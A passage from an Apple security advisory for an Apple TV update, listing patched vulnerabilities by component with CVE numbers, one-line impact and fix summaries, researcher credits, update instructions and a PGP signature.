Impact: Parsing a maliciously crafted video file may lead to kernel  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

AppleMobileFileIntegrity  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing

AVEVideoEncoder  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A logic issue was addressed with improved checks.  
CVE-2022-42848: ABC Research s.r.o

ImageIO  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing a maliciously crafted file may lead to arbitrary  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46693: Mickey Jin (@patch1t)

ImageIO  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Parsing a maliciously crafted TIFF file may lead to  
disclosure of user information  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42851: Mickey Jin (@patch1t)

IOHIDFamily  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-42864: Tommy Muir (@Muirey03)

IOMobileFrameBuffer  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46690: John Aakerblom (@jaakerblom)

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with additional  
validation.  
CVE-2022-46689: Ian Beer of Google Project Zero

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Connecting to a malicious NFS server may lead to arbitrary  
code execution with kernel privileges  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-46701: Felix Poulin-Belanger

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause kernel code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42845: Adam Doupé of ASU SEFCOM

libxml2  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An integer overflow was addressed through improved input  
validation.  
CVE-2022-40303: Maddie Stone of Google Project Zero

libxml2  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project  
Zero

Preferences  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to use arbitrary entitlements  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-42855: Ivan Fratric of Google Project Zero

Safari  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: A spoofing issue existed in the handling of URLs. This  
issue was addressed with improved input validation.  
CVE-2022-46695: KirtiKumar Anandrao Ramchandani

Software Update  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A user may be able to elevate privileges  
Description: An access issue existed with privileged API calls. This  
issue was addressed with additional restrictions.  
CVE-2022-42849: Mickey Jin (@patch1t)

Weather  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-42866: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may result in the  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved checks.  
CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited against versions of iOS released  
before iOS 15.1.  
Description: A type confusion issue was addressed with improved state  
handling.  
WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

Additional recognition

Kernel  
We would like to acknowledge Zweig of Kunlun Lab for their  
assistance.

Safari Extensions  
We would like to acknowledge Oliver Dunk and Christian R. of  
1Password for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher and scarlet for  
their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke  
NxkItA/+LIwJ66Odl7Uwp1N/qek5Z/TBuPKlbgTwRZGT3LBVMVmyHTBzebA88aNq  
Pae1RKQ2Txw4w9Tb7a08eeqRQD51MBoSjTxf23tO1o0B1UR3Hgq3gsOSjh/dTq9V  
Jvy4DpO15xdVHP3BH/li114JpgR+FoD5Du0rPffL01p6YtqeWMSvnRoCmwNcIqou  
i2ZObfdrL2WJ+IiDIlMoJ3v+B1tDxOWR6Mn37iRdzl+QgrQMQtP9pSsiAPCntA+y  
eFM5Hp0JlOMtCfA+xT+LRoZHCbjTCFMRlRbNffGvrNwwdTY4MXrSYlKcIo3yFT2m  
KSHrQNvqzWhmSLAcHlUNo0lVvtPAlrgyilCYaeRNgRC1+x8KRf/AcErXr23oKknJ  
lzIF6eVk1K3mxUmR+M+P8+cr14pbrUwJcQlm0In6/8fUulHtcElLE3fJ+HJVImx8  
RtvNmuCng5iEK1zlwgDvAKO3EgMrMtduF8aygaCcBmt65GMkHwvOGCDXcIrKfH9U  
sP4eY7V3t4CQd9TX3Vlmt47MwRTSVuUtMcQeQPhEUTdUbM7UlvtW8igrLvkz9uPn  
CpuE2mzhd/dJANXvMFBR9A0ilAdJO1QD/uSWL+UbKq4BlyiW5etd8gObQfHqqW3C  
sh0EwxLh4ATicRS9btAJMwIfK/ulYDWp4yuIsUamDj/sN9xWvXY=  
=i2O9  
-----END PGP SIGNATURE-----

Tag

#acer